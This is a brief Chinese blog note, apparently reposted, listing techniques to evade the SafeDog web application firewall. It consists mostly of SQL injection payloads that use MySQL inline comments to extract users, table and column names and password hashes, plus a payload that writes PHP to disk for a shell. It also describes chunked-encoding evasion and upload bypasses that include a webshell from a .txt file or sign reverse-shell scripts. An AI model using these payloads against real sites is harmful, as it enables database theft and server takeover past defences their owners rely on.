绕过安全狗【后续再更新】

sql绕过安全狗

get->post

借助burp

内联注释(加一些东西混淆)

看回显获取用户

url.php?id=-1'/*!50000union/*!(select*/1,2,3);
url.php?id=-1'/*!50000union/*!(select*/~1,2,3);
url.php?id=-1'/*!50000union/*!50000/*!(select*/~1,2,3)  
http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,user/*!50000(*/))
1' /*!44111union*/ /*!44111select*/ 1, /*!44111user*//*!44111()*/#
1' /*!44111union*/ /*!44111select*/ 1,(/*!44111select*//*!44111password*//*!44111from*//*!44111users*/limit 0,1)#

获取表名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),table_name from information_schema.tables where table_schema=database/*!50000(*/))

获取列名

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,user/*!50000(*/),column_name from information_schema.columns where table_name=’users’)

获取数据

http://127.0.0.1/killdog/dog.php?id=-1/*!12322union/*!11111/*!(select*/~1,2,group_concat(username,0x7e,password)from/*!`users`*/)

Getshell

http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/1,2,’<?php phpinfo();?>’ into outfile ‘dir’)

chunked编码(分割)

burp功能

其他

'&&true '&&false  ' && true ' && false
'||true '||false   ' || ture  ' ||false
字符型的话也可以通过浮点数 1.0and 1=1 来绕过对and的检测

异或xor

上传绕过安全狗

方法1:

php/asp/aspx/jsp 通用需要借助文件包含(不管是自己构造还是系统就有)

将大马写到txt文件中,命名为dama.txt,再新建一个文本

asp的写入<!-#include file="dama.txt"-> 保存,两文件放到同目录下,反问url/x.asp,然后访问即可

php的写入<?php require_once(dama.txt);?>

方法2:

有的安全狗不是识别内容,而是识别签名,可以使用工具将自己的脚本或者反弹shell的脚本加上签名,就可以绕过。

后面在继续更新。。。

原文地址:https://www.cnblogs.com/forforever/p/13773995.html